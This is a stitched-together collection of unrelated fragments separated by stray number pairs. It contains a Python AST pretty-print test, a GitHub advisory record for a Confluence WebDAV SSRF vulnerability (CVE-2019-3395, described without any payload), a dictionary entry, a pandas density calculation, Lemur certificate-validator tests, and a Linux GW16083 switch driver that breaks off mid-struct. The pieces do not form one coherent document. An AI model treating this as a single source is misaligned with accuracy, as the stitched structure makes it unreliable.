    (type('Name', (ast.Name,), {'__module__': 'custom'}), 'custom.Name'),
])
def test_pure_node(cls, identifier):
    """A bare node prints with the qualified name of its defining module."""
    instance = cls(id='value', ctx=None)
    assert pformat(instance) == "{}(id='value', ctx=None)".format(identifier)
284
892
{ "schema_version": "1.2.0", "id": "GHSA-63p3-c254-6c5g", "modified": "2022-05-13T01:04:38Z", "published": "2022-05-13T01:04:38Z", "aliases": [ "CVE-2019-3395" ], "details": "The WebDAV endpoint in Atlassian Confluence Server and Data Center before version 6.6.7 (the fixed version for 6.6.x), from version 6.7.0 before 6.8.5 (the fixed version for 6.8.x), and from version 6.9.0 before 6.9.3 (the fixed version for 6.9.x) allows remote attackers to send arbitrary HTTP and WebDAV requests from a Confluence Server or Data Center instance via Server-Side Request Forgery.", "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], "affected": [ ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-3395" }, { "type": "WEB", "url": "https://jira.atlassian.com/browse/CONFSERVER-57971" } ], "database_specific": { "cwe_ids": [ "CWE-918" ], "severity": "CRITICAL", "github_reviewed": false } }
495
335
{ "word": "Ancient", "definitions": [ "Belonging to the very distant past and no longer in existence.", "Having been in existence for a very long time.", "Showing or feeling signs of age or wear." ], "parts-of-speech": "Adjective" }
104
341
# Add a population density column
# NOTE(review): assumes the GeoDataFrame's CRS is metric, so `.area` is in m^2
# and the 10**6 factor yields inhabitants per km^2 — TODO confirm the CRS.
districts['population_density'] = districts['population'] / districts.geometry.area * 10**6
72
1,656
from datetime import datetime

import pytest
from marshmallow.exceptions import ValidationError

from lemur.common.utils import parse_private_key
from lemur.common.validators import verify_private_key_match
from lemur.tests.vectors import INTERMEDIATE_CERT, SAN_CERT, SAN_CERT_KEY


def test_private_key(session):
    """parse_private_key accepts a valid PEM key and raises on garbage input."""
    parse_private_key(SAN_CERT_KEY)

    with pytest.raises(ValueError):
        parse_private_key("invalid_private_key")


def test_validate_private_key(session):
    """verify_private_key_match passes for a matching cert/key pair only."""
    key = parse_private_key(SAN_CERT_KEY)

    verify_private_key_match(key, SAN_CERT)

    with pytest.raises(ValidationError):
        # Wrong key for certificate
        verify_private_key_match(key, INTERMEDIATE_CERT)


def test_sub_alt_type(session):
    """sub_alt_type rejects unsupported subject-alternative-name types."""
    from lemur.common.validators import sub_alt_type

    with pytest.raises(ValidationError):
        sub_alt_type("CNAME")


def test_dates(session):
    """dates requires both endpoints and a start that precedes the end."""
    from lemur.common.validators import dates

    # Valid: start before end.
    dates(dict(validity_start=datetime(2016, 1, 1), validity_end=datetime(2016, 1, 5)))

    # Missing end date.
    with pytest.raises(ValidationError):
        dates(dict(validity_start=datetime(2016, 1, 1)))

    # Missing start date.
    with pytest.raises(ValidationError):
        dates(dict(validity_end=datetime(2016, 1, 1)))

    # Start after end.
    with pytest.raises(ValidationError):
        dates(
            dict(validity_start=datetime(2016, 1, 5), validity_end=datetime(2016, 1, 1))
        )

    # NOTE(review): this range (2016-01-01 .. 2016-01-10) is also expected to
    # fail — presumably it exceeds a maximum validity window enforced by
    # `dates`; confirm against lemur.common.validators.
    with pytest.raises(ValidationError):
        dates(
            dict(
                validity_start=datetime(2016, 1, 1), validity_end=datetime(2016, 1, 10)
            )
        )
634
1,144
/*
 * drivers/net/phy/gw16083.c
 *
 * Driver for GW16083 Ventana Ethernet Expansion Mezzanine
 *
 * Author: <NAME>
 *
 * Copyright (c) 2014 <NAME> <<EMAIL>>
 *
 * This program is free software; you can redistribute it and/or modify it
 * under the terms of the GNU General Public License as published by the
 * Free Software Foundation; either version 2 of the License, or (at your
 * option) any later version.
 *
 */

/*
 * The GW16083 interfaces with a Ventana baseboard via the PCIe bus, an i2c
 * bus (i2c2), and a couple of GPIO's. On the PCIe bus is an i210 GigE with
 * its MAC connected to Port4 of a Marvell MV88E6176 7-port GigE switch via
 * MDIO and RGMII. Ports 0-3 are standard copper RJ45 but Ports 5 and 6
 * connect to Marvell MV88E1111 dual-mode Copper/Fiber PHY's over SGMII and
 * MDIO. The PHY's have both an RG45 for copper and an SFP module.
 */
#include <linux/kernel.h>
#include <linux/string.h>
#include <linux/errno.h>
#include <linux/unistd.h>
#include <linux/i2c.h>
#include <linux/interrupt.h>
#include <linux/init.h>
#include <linux/delay.h>
#include <linux/device.h>
#include <linux/netdevice.h>
#include <linux/etherdevice.h>
#include <linux/skbuff.h>
#include <linux/spinlock.h>
#include <linux/mm.h>
#include <linux/module.h>
#include <linux/mii.h>
#include <linux/ethtool.h>
#include <linux/phy.h>
#include <linux/marvell_phy.h>
#include <linux/of_platform.h>
#include <linux/platform_device.h>
#include <linux/io.h>
#include <asm/irq.h>
#include <net/dsa.h>
#include <linux/uaccess.h>

#include "gw16083.h"

/* Compile-time feature switches for this driver. */
#undef FAIL_ON_CHECKSUM_ERR	/* fail to configure SFP if checksum bad */
#define PORT_POWER_CONTROL	/* ports can be enabled/disabled via sysfs */
#define PORT_MODE_CONTROL	/* ports 5/6 can have SFP/RJ45 mode forced */
#define RGMII_DELAY_ON_PHY	/* implement Port5/6 tx/rx delay on PHY vs sw */

MODULE_DESCRIPTION("GW16083 driver");
MODULE_AUTHOR("<NAME>");
MODULE_LICENSE("GPL");

/* Per-port state for the two MV88E1111 combo (copper/SFP) ports (5 and 6). */
struct mv88e1111_port_state {
	int port;		/* switch port number (5 or 6) */
	bool present;
	bool serdes;		/* true when operating in SerDes/fiber mode */
	bool sfp_signal;
	bool sfp_present;
	bool sfp_compat;
	bool sfp_enabled;
	char sfp_id[64];	/* identification text read from the SFP */
};

/* Driver-private data shared between the PHY device and the i2c client. */
struct mv88e1111_priv {
	struct phy_device *phydev;
	struct i2c_client *client;
	struct mv88e1111_port_state port5;
	struct mv88e1111_port_state port6;
	struct kobject *sysfs_kobj;
	struct delayed_work work;
	struct workqueue_struct *workq;
};

/* Operating mode of a combo port. */
enum {
	mode_copper = 0,
	mode_serdes = 1,
};

#if IS_ENABLED(CONFIG_NET_DSA_MV88E6352)
/* DSA wiring: silkscreen names per MV88E6176 port; port 4 is the CPU port. */
static struct dsa_chip_data switch_chip_data = {
	.port_names = {
		"lan4",
		"lan3",
		"lan2",
		"lan1",
		"cpu",
		"lan5",
		"lan6",
	},
};

static struct dsa_platform_data switch_plat_data = {
	.nr_chips	= 1,
	.chip		= &switch_chip_data,
};

static struct platform_device switch_device = {
	.name			= "dsa",
	.id			= 0,
	.num_resources		= 0,
	.dev.platform_data	= &switch_plat_data,
};
#endif

static struct i2c_client *gw16083_client = NULL;

static int gw16083_read_port_sfp(struct i2c_client *client,
				 struct mv88e1111_port_state *state);

/* read switch port register from port0-6 */
u16 read_switch_port(struct phy_device *pdev, int port, u8 regaddr)
{
	return pdev->bus->read(pdev->bus, MV_BASE + port, regaddr);
}

/* write switch port register to port0-6 */
int write_switch_port(struct phy_device *pdev, int port, u8 regaddr, u16 val)
{
	return pdev->bus->write(pdev->bus, MV_BASE + port, regaddr, val);
}

/*
 * read_switch_port_phy - read a register for a specific port on 88E6176
 * The 88E6176 PHY registers must be accessed through the Global2 address
 * using the SMI_PHY_COMMAND_REG and SMI_PHY_DATA_REG.
 * Returns 0xffff if the busy bit does not clear within ~10ms.
 */
int read_switch_port_phy(struct phy_device *pdev, int port, u8 regaddr)
{
	struct mv88e1111_priv *priv = dev_get_drvdata(&pdev->dev);
	u16 reg;
	int i;

	dev_dbg(&priv->client->dev, "read_phy: port%d reg=0x%02x\n",
		port, regaddr);
	reg = SMIBUSY | SMIMODE22 | SMIOP_READ;
	reg |= port << DEVADDR;
	reg |= regaddr << REGADDR;
	pdev->bus->write(pdev->bus, MV_GLOBAL2, MV_SMI_PHY_COMMAND, reg);
	/* poll for the SMI busy bit (bit 15) to clear */
	for (i = 0; i < 10; i++) {
		reg = pdev->bus->read(pdev->bus, MV_GLOBAL2,
				      MV_SMI_PHY_COMMAND);
		if (!(reg & (1<<15)))
			break;
		mdelay(1);
	}
	/* timeout */
	if (i == 10)
		return 0xffff;
	reg = pdev->bus->read(pdev->bus, MV_GLOBAL2, MV_SMI_PHY_DATA);
	return reg;
}

/*
 * write_switch_port_phy - write a register for a specific port on 88E6176
 * The 88E6176 PHY registers must be accessed through the Global2 address
 * using the SMI_PHY_COMMAND_REG and SMI_PHY_DATA_REG.
 * Returns -ETIMEDOUT if the busy bit does not clear within ~10ms.
 */
int write_switch_port_phy(struct phy_device *pdev, int port, u8 addr, u16 reg)
{
	struct mv88e1111_priv *priv = dev_get_drvdata(&pdev->dev);
	int i;

	dev_dbg(&priv->client->dev, "write_phy: port%d reg=0x%02x val=0x%04x\n",
		port, addr, reg);
	pdev->bus->write(pdev->bus, MV_GLOBAL2, MV_SMI_PHY_DATA, reg);
	reg = SMIBUSY | SMIMODE22 | SMIOP_WRITE;
	reg |= port << DEVADDR;
	reg |= addr << REGADDR;
	pdev->bus->write(pdev->bus, MV_GLOBAL2, MV_SMI_PHY_COMMAND, reg);
	/* poll for the SMI busy bit (bit 15) to clear */
	for (i = 0; i < 10; i++) {
		reg = pdev->bus->read(pdev->bus, MV_GLOBAL2,
				      MV_SMI_PHY_COMMAND);
		if (!(reg & (1<<15)))
			break;
		mdelay(1);
	}
	/* timeout */
	if (i == 10)
		return -ETIMEDOUT;
	return 0;
}

/* read a scratch register from switch */
inline u8 read_switch_scratch(struct phy_device *pdev, u8 reg)
{
	pdev->bus->write(pdev->bus, MV_GLOBAL2, MV_SCRATCH_MISC, (reg << 8));
	return pdev->bus->read(pdev->bus, MV_GLOBAL2, MV_SCRATCH_MISC) & 0xff;
}

/* write a scratch register to switch */
inline void write_switch_scratch(struct phy_device *pdev, u8 reg, u8 val)
{
	/* bit 15 latches the update; reg in bits 14:8, value in bits 7:0 */
	pdev->bus->write(pdev->bus, MV_GLOBAL2, MV_SCRATCH_MISC,
			 (1 << 15) | (reg << 8) | val);
}

/* enable or disable an SFP's TXEN signal */
/*
 * enable_sfp_txen - drive the SFP transmit-enable GPIO for port5/port6
 * @pdev:   MV88E6176 phy device
 * @port:   switch port (5 or 6)
 * @enable: true to enable the SFP transmitter, false to disable it
 *
 * FIB5_TXEN#/FIB6_TXEN# are active-low outputs on switch GPIO1/GPIO2
 * (the probe routine parks them high, i.e. transmitter off).  The
 * original code OR'd the bit in to "enable" and used gpio &= (1 << bit)
 * to "disable", which both inverted the documented polarity and wiped
 * every *other* GPIO output bit.
 *
 * Returns 0 on success or -EINVAL for an invalid port.
 */
static int enable_sfp_txen(struct phy_device *pdev, int port, bool enable)
{
	struct mv88e1111_priv *priv = dev_get_drvdata(&pdev->dev);
	u8 gpio;
	int bit;

	if (port != 5 && port != 6)
		return -EINVAL;

	/* GPIO[2:1] output low to enable TXEN */
	bit = (port == 5) ? 1 : 2;
	gpio = read_switch_scratch(pdev, MV_GPIO_DATA);
	if (enable)
		gpio &= ~(1 << bit);	/* TXEN# low: transmitter on */
	else
		gpio |= (1 << bit);	/* TXEN# high: transmitter off */
	write_switch_scratch(pdev, MV_GPIO_DATA, gpio);
	dev_info(&priv->client->dev, "Port%d: SFP TX %s\n", port,
		 enable ? "enabled" : "disabled");

	return 0;
}

/* configure mv88e1111 port for copper or serdes
 * For Copper we set auto link/duplex/speed detection
 * For SerDes/Fiber we force 1000mbps link up and auto-neg duplex
 */
static int config_mv88e1111_port_sfp(struct phy_device *pdev, int port,
				     bool sfp)
{
	struct mv88e1111_priv *priv = dev_get_drvdata(&pdev->dev);
	u16 reg;

	if (port != 5 && port != 6)
		return -EINVAL;
	dev_dbg(&priv->client->dev, "%s: Port%d %s\n", __func__, port,
		sfp ? "SFP" : "copper");
	if (sfp) {
		enable_sfp_txen(pdev, port, 1);
		/* configure MV88E6176 Physical Control Port Register */
		dev_info(&priv->client->dev,
			 "Port%d: SFP: force 1000mbps link up "
			 "(auto-negotiate duplex)\n", port);
		reg = read_switch_port(pdev, port, MV_PORT_PHYS_CONTROL);
		reg &= ~0x3f;			/* clear 5-0 */
		reg |= (1 << 4) | (1 << 5);	/* force link up */
		reg |= 2;			/* force 1000mbps */
		write_switch_port(pdev, port, MV_PORT_PHYS_CONTROL, reg);
	}
	/* copper */
	else {
		enable_sfp_txen(pdev, port, 0);
		/* configure MV88E6176 Physical Control Port Register */
		dev_info(&priv->client->dev,
			 "Port%d: Copper: set auto-neg link/duplex/speed\n",
			 port);
		reg = read_switch_port(pdev, port, MV_PORT_PHYS_CONTROL);
		reg &= ~0x3f;	/* clear 5-0 */
		reg |= 3;	/* speed not forced */
		write_switch_port(pdev, port, MV_PORT_PHYS_CONTROL, reg);
	}
	/* (dead re-reads of MV_PORT_PHYS_CONTROL after each write removed;
	 * the debug read below reports the final value) */
	dev_dbg(&priv->client->dev, "%s: Port%d %s PORT_PHYS_CONTROL=0x%04x\n",
		__func__, port, sfp ?
"SFP" : "copper", read_switch_port(pdev, port, MV_PORT_PHYS_CONTROL)); return 0; } #if !IS_ENABLED(CONFIG_NET_DSA_MV88E6352) && defined(PORT_POWER_CONTROL) static int enable_switch_port(struct phy_device *pdev, int port, bool enable) { struct mv88e1111_priv *priv = dev_get_drvdata(&pdev->dev); u16 reg; /* power up port */ dev_info(&priv->client->dev, "Port%d: %s\n", port, enable ? "normal operation" : "power down"); reg = read_switch_port_phy(pdev, port, MV_PHY_CONTROL); if (enable) reg &= ~(1 << 11); /* Normal Operation */ else reg |= (1 << 11); /* power down */ write_switch_port_phy(pdev, port, MV_PHY_CONTROL, reg); reg = read_switch_port_phy(pdev, port, MV_PHY_CONTROL1); if (enable) reg &= ~(1 << 2); /* Normal Operation */ else reg |= (1 << 2); /* power down */ write_switch_port_phy(pdev, port, MV_PHY_CONTROL1, reg); return 0; } #endif /* * Sysfs API */ struct mv88e1111_port_state *get_port_state(struct mv88e1111_priv *priv, int port) { if (port == 5) return &priv->port5; if (port == 6) return &priv->port6; return NULL; } /* * get MV88E6176 port number for a specific GW16083 port name * The GW16083 ports as shown on the silkscreen are not mapped according to * the MV88E6176 ports numbers. */ static int gw16083_get_port(const char* name) { int i; int map[] = { 3, 2, 1, 0, 5, 6 }; if (strncasecmp(name, "LAN", 3) != 0) return -1; i = name[3] - '0'; if (i < 1 || i > 6) return -1; return map[i-1]; } #if !IS_ENABLED(CONFIG_NET_DSA_MV88E6352) static ssize_t port_show(struct device *dev, struct device_attribute *attr, char *buf) { struct mv88e1111_priv *priv = dev_get_drvdata(dev); int port = -1; u16 reg; if (sscanf(attr->attr.name, "port%d", &port) != 1) return 0; if (port < 0 || port > 6) return 0; reg = read_switch_port_phy(priv->phydev, port, MV_PHY_CONTROL); return sprintf(buf, "%s\n", (reg & (1 << 11)) ? 
"disabled" : "enabled"); } #if defined(PORT_POWER_CONTROL) static ssize_t port_store(struct device *dev, struct device_attribute *attr, const char *buf, size_t count) { struct mv88e1111_priv *priv = dev_get_drvdata(dev); int port = -1; int val; port = gw16083_get_port(attr->attr.name); if (port < 0) return 0; if (sscanf(buf, "%d", &val) != 1) return 0; enable_switch_port(priv->phydev, port, val ? 1 : 0); return count; } static DEVICE_ATTR(lan1, S_IWUSR | S_IRUGO, port_show, port_store); static DEVICE_ATTR(lan2, S_IWUSR | S_IRUGO, port_show, port_store); static DEVICE_ATTR(lan3, S_IWUSR | S_IRUGO, port_show, port_store); static DEVICE_ATTR(lan4, S_IWUSR | S_IRUGO, port_show, port_store); static DEVICE_ATTR(lan5, S_IWUSR | S_IRUGO, port_show, port_store); static DEVICE_ATTR(lan6, S_IWUSR | S_IRUGO, port_show, port_store); #else static DEVICE_ATTR(lan1, S_IRUGO, port_show, NULL); static DEVICE_ATTR(lan2, S_IRUGO, port_show, NULL); static DEVICE_ATTR(lan3, S_IRUGO, port_show, NULL); static DEVICE_ATTR(lan4, S_IRUGO, port_show, NULL); static DEVICE_ATTR(lan5, S_IRUGO, port_show, NULL); static DEVICE_ATTR(lan6, S_IRUGO, port_show, NULL); #endif #endif /* #if IS_ENABLED(CONFIG_NET_DSA_MV88E6352) */ static ssize_t portmode_show(struct device *dev, struct device_attribute *attr, char *buf) { struct mv88e1111_priv *priv = dev_get_drvdata(dev); struct mv88e1111_port_state *state; state = get_port_state(priv, gw16083_get_port(attr->attr.name)); if (!state) return 0; return sprintf(buf, "%s\n", state->serdes ? 
"SFP" : "RJ45"); } #ifdef PORT_MODE_CONTROL static ssize_t portmode_store(struct device *dev, struct device_attribute *attr, const char *buf, size_t count) { struct mv88e1111_priv *priv = dev_get_drvdata(dev); struct mv88e1111_port_state *state; u16 reg; int port; port = gw16083_get_port(attr->attr.name); state = get_port_state(priv, port); if (!state) return 0; reg = read_switch_port_phy(priv->phydev, port, MII_M1111_PHY_EXT_SR); if (strcasecmp(buf, "auto") == 0) { reg &= ~(1<<15); /* enable auto-selection */ dev_info(&priv->client->dev, "Port%d: enable auto-selection\n", port); } else if (strcasecmp(buf, "RJ45") == 0) { reg |= (1<<15); /* disable auto-selection */ reg |= 0xb; /* RGMII to Copper */ config_mv88e1111_port_sfp(priv->phydev, port, 0); dev_info(&priv->client->dev, "Port%d: select RJ45\n", port); } else if (strcasecmp(buf, "SFP") == 0) { reg |= (1<<15); /* disable auto-selection */ reg |= 0x3; /* RGMII to Fiber */ config_mv88e1111_port_sfp(priv->phydev, port, 1); dev_info(&priv->client->dev, "Port%d: select SFP\n", port); } write_switch_port_phy(priv->phydev, port, MII_M1111_PHY_EXT_SR, reg); return count; } static DEVICE_ATTR(lan5_mode, S_IWUSR | S_IRUGO, portmode_show, portmode_store); static DEVICE_ATTR(lan6_mode, S_IWUSR | S_IRUGO, portmode_show, portmode_store); #else static DEVICE_ATTR(lan5_mode, S_IRUGO, portmode_show, NULL); static DEVICE_ATTR(lan6_mode, S_IRUGO, portmode_show, NULL); #endif static ssize_t portsfp_show(struct device *dev, struct device_attribute *attr, char *buf) { struct mv88e1111_priv *priv = dev_get_drvdata(dev); struct mv88e1111_port_state *state; state = get_port_state(priv, gw16083_get_port(attr->attr.name)); if (!state) return 0; if (!state->sfp_present) return 0; return sprintf(buf, "%s\n", state->sfp_id); } static DEVICE_ATTR(lan5_sfp, S_IRUGO, portsfp_show, NULL); static DEVICE_ATTR(lan6_sfp, S_IRUGO, portsfp_show, NULL); /* * PHY driver */ /* check MV88E1111 PHY status and MV88E6176 GPIO */ static void 
mv88e6176_work(struct work_struct *work)
{
	struct mv88e1111_priv *priv = container_of(work, struct mv88e1111_priv,
						   work.work);
	struct phy_device *pdev = priv->phydev;
	struct device *dev = &priv->client->dev;
	struct mv88e1111_port_state *state;
	bool serdes, sfp_present, sfp_signal;
	int port;
	u16 gpio;

	/* serialize against the phylib state machine and sysfs handlers */
	mutex_lock(&pdev->lock);
	gpio = read_switch_scratch(pdev, MV_GPIO_DATA);
	for (port = 5; port < 7; port++) {
		/* bit13 of the MV88E1111 extended status register reports
		 * whether fiber/serdes resolution is currently selected */
		serdes = (read_switch_port_phy(pdev, port,
			  MII_M1111_PHY_EXT_SR) & (1<<13)) ? 1 : 0;
		dev_dbg(dev, "%s: Port%d GPIO:0x%02x SerDes:%d\n", __func__,
			port, gpio, serdes);
		/* MOD_ABS#/LOS inputs are active-low on the switch GPIOs
		 * (GPIO5/6 for port5, GPIO3/4 for port6 - see probe) */
		switch(port) {
		case 5:
			state = &priv->port5;
			sfp_present = !((gpio >> 5) & 1);
			sfp_signal = !((gpio >> 6) & 1);
			break;
		case 6:
			state = &priv->port6;
			sfp_present = !((gpio >> 3) & 1);
			sfp_signal = !((gpio >> 4) & 1);
			break;
		}
		/*
		 * on sfp_detect read/verify SFP MSA and set sfp_compat
		 * on sfp_signal issue link down?
		 * on serdes auto-select
		 */
		if (state->sfp_present != sfp_present) {
			state->sfp_present = sfp_present;
			dev_info(dev, "Port%d: SFP %s\n", port,
				 sfp_present ? "inserted" : "removed");
			if (state->sfp_present) {
				if (gw16083_read_port_sfp(priv->client, state))
					state->sfp_compat = false;
				else
					state->sfp_compat = true;
				/* trigger a re-select/enable below */
				state->serdes = !serdes;
				pdev->state = PHY_RUNNING;
			} else {
				state->sfp_compat = false;
				state->sfp_enabled = false;
				pdev->state = PHY_NOLINK;
			}
		}
		if (state->sfp_signal != sfp_signal) {
			state->sfp_signal = sfp_signal;
			dev_info(dev, "Port%d: SFP signal %s\n", port,
				 sfp_signal ? "detected" : "lost");
		}
		if (state->serdes != serdes) {
			state->serdes = serdes;
			dev_info(dev, "Port%d: %s auto-selected\n", port,
				 serdes ? "SERDES" : "copper");
			/*
			 * if auto-selection has switched to copper
			 * disable serdes
			 */
			if (!serdes) {
				config_mv88e1111_port_sfp(pdev, port, 0);
				state->sfp_enabled = false;
			}
		}
		/* if compatible SFP module and not yet enabled then enable */
		if (state->sfp_compat && state->sfp_signal &&
		    !state->sfp_enabled) {
			if (!config_mv88e1111_port_sfp(pdev, port, 1))
				state->sfp_enabled = true;
		}
	}
	mutex_unlock(&pdev->lock);

	/* re-poll in one second */
	queue_delayed_work(priv->workq, &priv->work, HZ);
}

/* link state is managed by the switch/worker, not by phylib polling */
static int mv88e6176_read_status(struct phy_device *pdev)
{
	return 0;
}

/* nothing to do: the switch ports auto-negotiate on their own */
static int mv88e6176_config_aneg(struct phy_device *pdev)
{
	return 0;
}

static int mv88e6176_config_init(struct phy_device *pdev)
{
	pdev->state = PHY_RUNNING;
	return 0;
}

/* undo everything mv88e6176_probe registered */
static void mv88e6176_remove(struct phy_device *pdev)
{
	struct mv88e1111_priv *priv = dev_get_drvdata(&pdev->dev);

	dev_dbg(&priv->client->dev, "%s", __func__);
	destroy_workqueue(priv->workq);
#if !IS_ENABLED(CONFIG_NET_DSA_MV88E6352)
	device_remove_file(&pdev->dev, &dev_attr_lan1);
	device_remove_file(&pdev->dev, &dev_attr_lan2);
	device_remove_file(&pdev->dev, &dev_attr_lan3);
	device_remove_file(&pdev->dev, &dev_attr_lan4);
	device_remove_file(&pdev->dev, &dev_attr_lan5);
	device_remove_file(&pdev->dev, &dev_attr_lan6);
#endif
	device_remove_file(&pdev->dev, &dev_attr_lan5_sfp);
	device_remove_file(&pdev->dev, &dev_attr_lan6_sfp);
	device_remove_file(&pdev->dev, &dev_attr_lan5_mode);
	device_remove_file(&pdev->dev, &dev_attr_lan6_mode);
	sysfs_remove_link(kernel_kobj, "gw16083");
}

/*
 * mv88e6176_probe - called any time an MV88E6176 is found on an mdio bus
 * Determine if this MV88E6176 is indeed on a GW16083 and if so configure
 * the port5/port6 phy and register a background procedure for monitoring
 * their states to support SFP vs Copper switching.
 *
 * Verify this is a GW16083 by ensuring:
 *  - the phy address matches that of a GW16083
 *  - the mdio bus is from an i210 device (igb driver)
 *  - there are MV881111 PHY's hanging off of Port5 and Port6
 */
static int mv88e6176_probe(struct phy_device *pdev)
{
	int port;
	int ret = 0;
	u32 id, reg;
	struct mv88e1111_priv *priv;
	struct device *dev;
#if IS_ENABLED(CONFIG_NET_DSA_MV88E6352)
	struct net_device *netdev = NULL;
#endif

	dev_dbg(&pdev->dev, "%s: addr=0x%02x bus=%s:%s gw16083_client=%p\n",
		__func__, pdev->addr, pdev->bus->name, pdev->bus->id,
		gw16083_client);

	/* In single-chip addressing mode the MV88E6176 shows up on 0x10-0x16 */
	if (pdev->addr != MV_BASE)
		return 0;

	/* i2c driver needs to be loaded first */
	if (!gw16083_client)
		return 0;
	dev = &gw16083_client->dev;

	/* gw16083 has MV88E1676 hanging off of i210 mdio bus */
	if (strcmp(pdev->bus->name, "igb_enet_mii_bus") != 0)
		return 0;

	/* verify Port5/Port6 have an MV88E1111 PHY hanging off them */
	for (port = 5; port < 7; port++) {
		id = read_switch_port_phy(pdev, port,
					  MII_M1111_PHY_IDENT0) << 16;
		id |= read_switch_port_phy(pdev, port, MII_M1111_PHY_IDENT1);
		if ((id & MII_M1111_PHY_ID_MASK) != MII_M1111_PHY_ID) {
			dev_err(dev, "Port%d: No MV88E1111 PHY detected", port);
			return 0;
		}
	}

#if IS_ENABLED(CONFIG_NET_DSA_MV88E6352)
	/*
	 * Find the netdev this bus is hanging off of and register with DSA:
	 * The netdev must be an Intel I210 (igb) with Gateworks MAC addr
	 */
	read_lock(&dev_base_lock);
	for_each_netdev(&init_net, netdev) {
		/* 00:d0:12 is the Gateworks OUI */
		if (netdev->dev.parent &&
		    !strcmp(netdev->dev.parent->driver->name, "igb") &&
		    (netdev->perm_addr[0] == 0x00) &&
		    (netdev->perm_addr[1] == 0xd0) &&
		    (netdev->perm_addr[2] == 0x12)) {
			switch_plat_data.netdev = &netdev->dev;
			switch_plat_data.chip[0].host_dev = &pdev->bus->dev;
			break;
		}
	}
	read_unlock(&dev_base_lock);
	if (switch_plat_data.netdev) {
		platform_device_register(&switch_device);
		dev_info(dev, "registered GW16083 DSA switch\n");
	} else {
		dev_err(dev, "failed to find netdev for DSA switch\n");
	}
#endif

	/*
	 * port5/6 config: MV88E1111 PHY
	 *  Register 20: PHY Control Register
	 *   R20_7: add delay to RX_CLK for RXD
	 *   R20_1: add delay to TX_CLK for TXD
	 *  Register 24: LED Control Register
	 *   0x4111:
	 *    Pulse stretch 170 to 340 ms
	 *  Register 0: Control Register
	 *   R0_15: phy reset
	 */
	dev_info(dev, "Configuring MV88E6176 7-port switch");
	for (port = 5; port < 7; port++) {
#ifdef RGMII_DELAY_ON_PHY
		/* phy rx/tx delay */
		reg = read_switch_port_phy(pdev, port, MII_M1111_PHY_EXT_CR);
		reg |= (1<<1) | (1<<7);
		write_switch_port_phy(pdev, port, MII_M1111_PHY_EXT_CR, reg);
#else
		/* RGMII delays on the switch side instead of the phy */
		write_switch_port(pdev, port, MV_PORT_PHYS_CONTROL, 0xC003);
#endif
		/* led config */
		write_switch_port_phy(pdev, port, MII_M1111_PHY_LED_CONTROL,
				      MII_M1111_PHY_LED_PULSE_STR);
		/* reset phy */
		reg = read_switch_port_phy(pdev, port, MII_M1111_PHY_CONTROL);
		reg |= MII_M1111_PHY_CONTROL_RESET;
		write_switch_port_phy(pdev, port, MII_M1111_PHY_CONTROL, reg);
		dev_info(dev, "Port%d: MV88E111 PHY configured\n", port);
	}

	/*
	 * GPIO Configuration:
	 *  GPIO1: FIB5_TXEN# (output)
	 *  GPIO2: FIB6_TXEN# (output)
	 *  GPIO3: FIB6_PRES# (input)
	 *  GPIO4: FIB6_LOS (input)
	 *  GPIO5: FIB5_PRES# (input)
	 *  GPIO6: FIB5_LOS (input)
	 */
	write_switch_scratch(pdev, MV_GPIO_DATA, 0x06); /* GPIO[2:1] out hi */
	write_switch_scratch(pdev, MV_GPIO_DIR, 0x78);  /* GPIO[6:3] inp */

	pdev->irq = PHY_POLL;
	priv = devm_kzalloc(&pdev->dev, sizeof(*priv), GFP_KERNEL);
	if (!priv)
		return -ENOMEM;
	/* NOTE(review): redundant - devm_kzalloc() already zeroes priv */
	memset(priv, 0, sizeof(*priv));
	priv->phydev = pdev;
	priv->client = gw16083_client;
	priv->port5.port = 5;
	priv->port6.port = 6;
	dev_set_drvdata(&pdev->dev, priv);

	/* register sysfs API */
#if !IS_ENABLED(CONFIG_NET_DSA_MV88E6352)
	ret |= device_create_file(&pdev->dev, &dev_attr_lan1);
	ret |= device_create_file(&pdev->dev, &dev_attr_lan2);
	ret |= device_create_file(&pdev->dev, &dev_attr_lan3);
	ret |= device_create_file(&pdev->dev, &dev_attr_lan4);
	ret |= device_create_file(&pdev->dev, &dev_attr_lan5);
	ret |= device_create_file(&pdev->dev, &dev_attr_lan6);
#endif
	ret |= device_create_file(&pdev->dev, &dev_attr_lan5_sfp);
	ret |= device_create_file(&pdev->dev, &dev_attr_lan6_sfp);
	ret |= device_create_file(&pdev->dev, &dev_attr_lan5_mode);
	ret |= device_create_file(&pdev->dev, &dev_attr_lan6_mode);
	if (unlikely(ret))
		dev_err(&pdev->dev, "Failed creating attrs\n");

	/* Add a nice symlink to the real device */
	ret = sysfs_create_link(kernel_kobj, &pdev->dev.kobj, "gw16083");

	/* start the SFP/copper monitor (see mv88e6176_work) */
	INIT_DELAYED_WORK(&priv->work, mv88e6176_work);
	priv->workq = create_singlethread_workqueue("gw16083");
	if (!priv->workq)
		return -ENODEV;
	queue_delayed_work(priv->workq, &priv->work, 0);

	dev_dbg(dev, "initial state: GPIO=0x%02x "
		"Port5_serdes=%d Port6_serdes=%d\n",
		read_switch_scratch(pdev, MV_GPIO_DATA),
		(read_switch_port_phy(pdev, 5, MII_M1111_PHY_EXT_SR)
		 & (1<<13) ? 1:0),
		(read_switch_port_phy(pdev, 6, MII_M1111_PHY_EXT_SR)
		 & (1<<13) ? 1:0));

	return ret;
}

static struct phy_driver mv88e6176_phy_driver = {
	.name		= "gw16083",
	.phy_id		= MV_IDENT_VALUE,
	.phy_id_mask	= MV_IDENT_MASK,
	.features	= PHY_BASIC_FEATURES,
	.probe		= &mv88e6176_probe,
	.remove		= &mv88e6176_remove,
	.config_init	= &mv88e6176_config_init,
	.config_aneg	= &mv88e6176_config_aneg,
	.read_status	= &mv88e6176_read_status,
	.driver		= { .owner = THIS_MODULE },
};

/*
 * I2C driver
 */

/* See SFF-8472 */
struct sfp_msa {
	/* Basic ID fields */
	u8	identifier;
	u8	ext_identifier;
	u8	connector;
	u8	transceiver[8];
	u8	encoding;
	u8	br_nominal;
	u8	rate_identifier;
	u8	length_smf_km;
	u8	length_smf;
	u8	length_om2;
	u8	length_om1;
	u8	length_om4;
	u8	length_om3;
	u8	vendor_name[16];
	u8	transceiver2;
	u8	vendor_oui[3];
	u8	vendor_pn[16];
	u8	vendor_rev[4];
	u8	wavelength[2];
	u8	resv1;
	u8	cc_base;	/* checksum over bytes 0-62 */

	/* extended id fields */
	u8	options[2];
